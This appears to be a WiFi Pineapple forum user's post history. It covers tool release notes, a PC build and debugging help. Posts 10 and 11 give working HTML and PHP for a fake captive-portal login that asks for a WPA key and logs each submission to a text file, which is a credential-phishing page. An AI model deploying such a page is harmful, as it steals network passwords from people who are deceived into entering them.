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Everything posted by newbi3

  1. Version 1.0 has been released in the Pineapple bar!
  2. Yeah I read that last night and saw the CNN video not to long ago. It sounds like they are using karma but not necessarily a pineapple
  3. A fix for this has been submitted and will be available soon. Please update to version 2.4
  4. There seems to be a compatibility issue with SMSer 2.3 on version 1.1.1 of the firmware: When you install it from the pineapple bar it doesn't appear to ever actually install... I am looking into this issue so be expecting version 2.4 within the next few days.
  5. Another awesome release! I love the way that the CLI is going in :D
  6. Yeah I don't think nodogsplash is the tool to use for this considering it can't process PHP
  7. Version 1.3 has just been pushed and will be available for update soon. Please make sure your firmware is version 1.1.0 or greater. This update will keep black out compatible with futures versions of the firmware by using the "pineapple led" command to control the LEDs since the previous method will be removed soon. Also this update includes the ability to reset the functionality of the LEDs so they return to their normal state. Again just to make this perfectly clear: Firmware version 1.1.0 or greater is required or black out will not work!
  8. I'd like to see some bench marks comparing the two with hash cat as well as skyrim.. I do like using hashcat....
  9. You will need PHP, nodogsplash, and mysql it sounds like. I'm not sure if you will have room for all of that on your router
  10. HTML <h1>Login</h1> <br> <h2>Wpakey:</h2> <form action="" id="login-form" method="post"> <input type="password" name="wpakey" id="wpakey"> <input type="submit" value="Log in"> </form> PHP <html> <body> <?php date_default_timezone_set('Etc/GMT-1'); $date = date('m/d/Y G:i:s', time()); $space = ' '; $dataString = $_POST["wpakey"]; $dataString .= "\n"; $fWrite = fopen("guestbook.txt","a"); $wrote = fwrite($fWrite, $date.$space.$dataString); fclose($fWrite); ?> </body> </html> I don't have the time to test it right now but go ahead and try that
  11. try this: if that saves testing123 to a file then your problem is with your html. It could very well be that in your HTML form you are using a "POST" and in your PHP you are expecting a "GET" $dataString = $_GET["wpakey"]; If that is the case change $_GET to $_POST and that should fix your issue. $dataString = $_POST["wpakey"];
  12. Yes, I replied to your post on the mk v topic
  13. The memory will be 1600 and the reason why i went with a power supply with such high watts is for upgrading but like you said it is kind of over kill. I do still want some wiggle room and I haven't heard of that brand ethier so I am thinking about this one instead http://www.amazon.com/Corsair-Series-80PLUS-Gold-Certified-Supply/dp/B00EB7UITQ/ref=sr_1_5?ie=UTF8&qid=1395240922&sr=8-5&keywords=750w+power+supply
  14. Firmware version 2.0.4 or greater is required for this infusion. Data Locker is an Infusion that allows for easy AES 128/256 encryption of files or strings on your wifi pineapple. It has been built with integration from other developers in mind and is fully function from the command line. Features AES-128 and AES-256 SHA512 Key Hashing Variable Length Keys CLI Integration Web Interface SQLite File Tracker (to easily see what files you have encrypted and when) String Encryption (for use by developers who want to encrypt logs in real time) Encrypting and decrypting files Shredding files (Overwrites a file 20 times, renames it, then deletes it) Change Log Version 1.3 Firmware version 2.0.4 or greater is now required Tabs are now created with the drawTabs function for forward firmware compatibility UI has been re-designed to look much nicer Removed javascript in notifications File Tracker refreshes independently from the rest of the tile now Version 1.2 Large tile now refreshes when file is encrypted/decrypted Firmware version 1.4 or greater is now required. Version 1.1 Added Key Verification A sha512 hash value of the encryption key is stored in the database for later checks Now checks for max key length overflow Spelling error fixed (thanks to Skeletor) Version 1.0 - Initial Release Web Interface Command Line Interface AES-128/256 File Encryption AES-128/256 String Encryption Variable Length Keys File Tracker File Shredding ​​​ Screen Shots Video of early Development: Incase you can't see the videos for some reason:
  15. Try making a file called test.php and in it write <?php echo "hello world"; ?> Then with nodogsplash running try to access let me know if you see "hello world"
  16. I'll definitely get the WD Black series hdd and I'll keep an eye out for some other SSD thanks for the input!
  17. With my new job as a software developer I am quickly out growing my current machine and its time to build a new one. I need for very heavy development use running multiple instances of Visual Studio, SQL Managment console, virtual machines, and what ever side project I am working on at the time. Also it would be nice to be able to use the same PC for Elder Scrolls Online with the highest settings. Below is a part list that I have come up with. Anything that you would change or also recommend? mother board: MSI Z87-GD65 ram: corsair vengance 32gb gpu: evga gtx770 gpu: evga gtx770 cpu: intel i7 4770k power supply: 1000watt xion 1000p14f heat sink: cooler master n520 case: nztx guardian black ssd: Samsung 840 evo 500gb ssd: Samsung 840 evo 500gb regular hard: drive 1tb wd blue monitor: asus vn247h-p 24inch monitor: asus vn247h-p 24inch OS: Windows 8.1 pro (got to use it for work :/) I have a budget of $3,000 for this build and I will be re-using some monitors that I have already for this PC. What am I missing that I should add or what should I change?
  18. Have your HTML page post the information to a PHP script on your webserver thats runs on port 8080 in /www and have that script save it to a text file
  19. Just to close this story: I ended up cloning the SCSI drive over to an IDE drive and then dding that drive over to an image that I converted into a virtual machine image. When I booted it, it crashed with a bunch of errors (it couldn't find its SCSI hdd) After that I decided I would clone the SCSI drive to another SCSI drive that I could boot on the original system so I could mess around with it and make something that I could boot in the VM. I went ahead and orderd the 50pin SCSI drive and it was DOA then I sent it back and got another one which, not surprisingly, was also DOA. At this point there wasn't time to get a new hard drive so I just had to stabilize the machine and keep it running so I could make the move to the new office in California. I hate SCO.
  20. <img src="$imagesdir/button1.png" style="position: absolute; top: 169px; left: 323px; z-index: 1; width: 360px height="365"" id="Image10" /> Your issue is here. Your'e saying height="365"" It should be height:365px Also you need a ; after width: 360px Here is the corrected code. <img src="$imagesdir/button1.png" style="position: absolute; top: 169px; left: 323px; z-index: 1; width: 360px; height: 365px;" id="Image10" />
  21. SMSer version 2.3 has been released! Please update right away! This contains a fix for all of those who are using sprint as well as command line integration. version 2.3 Changes Fixed base64 encoding issue for sprint (special thanks to THCMinister) Improved logging Fixed typos in keywords Added a delete option for "Received Messages" Added a warning for Two Factor Login Added command-line integration Here is a video going over the features of this release
  22. I can't wait to start messing around with the new pineapple command line tools :D
  23. I'm not sure if anyone has mention it or not but the interface does not have logic for hidden SSIDs at the moment, being able to specify the SSID or having a manual configuration mode would be a nice feature.
  24. It seems to me like the majority of the users with this problem are using sprint. This weekend I am going to experiment with some stuff and see what I can get working. I do not have access to a spring phone so if you are interested in helping me I'll contact you over PM and we can get this fixed
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